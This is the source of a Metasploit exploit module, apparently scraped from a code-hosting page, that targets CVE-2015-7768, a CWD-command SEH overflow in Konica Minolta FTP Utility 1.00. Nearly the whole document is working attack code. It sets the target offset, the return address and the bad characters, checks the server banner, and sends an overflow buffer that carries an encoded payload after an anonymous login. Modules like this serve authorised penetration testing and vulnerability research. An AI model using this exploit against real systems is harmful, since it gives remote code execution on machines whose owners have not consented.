Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8

9
  include Msf::Exploit::Remote::Ftp
10
  include Msf::Exploit::Seh
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name' => 'Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow',
15
      'Description' => %q{
16
          This module exploits an SEH overflow in Konica Minolta FTP Server 1.00.
17
        Konica Minolta FTP fails to check input size when parsing 'CWD' commands, which
18
        leads to an SEH overflow.  Konica FTP allows anonymous access by default; valid
19
        credentials are typically unnecessary to exploit this vulnerability.
20
      },
21
      'Author' =>
22
        [
23
          'Shankar Damodaran', # stack buffer overflow dos p.o.c
24
          'Muhamad Fadzil Ramli <mind1355[at]gmail.com>' # seh overflow, metasploit module
25
        ],
26
      'License' => MSF_LICENSE,
27
      'Notes' => {
28
        'Stability' => [],
29
        'SideEffects' => [],
30
        'Reliability' => []
31
      },
32
      'References' =>
33
        [
34
          [ 'CVE', '2015-7768' ],
35
          [ 'EDB', '37908' ]
36
        ],
37
      'Privileged' => false,
38
      'Payload' =>
39
        {
40
          'Space' => 1500,
41
          'BadChars' => "\x00\x0a\x2f\x5c",
42
          'DisableNops' => true
43
        },
44
      'Platform' => 'win',
45
      'Targets' =>
46
        [
47
          [
48
            'Windows 7 SP1 x86',
49
            {
50
              'Ret' => 0x12206d9d, # ppr - KMFtpCM.dll
51
              'Offset' => 1037
52
            }
53
          ]
54
        ],
55
      'DisclosureDate' => '2015-08-23',
56
      'DefaultTarget' => 0))
57
  end
58

59
  def check
60
    connect
61
    disconnect
62

63
    if banner =~ /FTP Utility FTP server \(Version 1\.00\)/
64
      return Exploit::CheckCode::Detected
65
    else
66
      return Exploit::CheckCode::Safe
67
    end
68
  end
69

70
  def exploit
71
    connect_login
72

73
    buf = rand_text(target['Offset'])
74
    buf << generate_seh_record(target.ret)
75
    buf << payload.encoded
76
    buf << rand_text(3000)
77

78
    print_status("Sending exploit buffer...")
79
    send_cmd(['CWD', buf], false) # this will automatically put a space between 'CWD' and our attack string
80

81
    handler
82
    disconnect
83
  end
84
end
85

86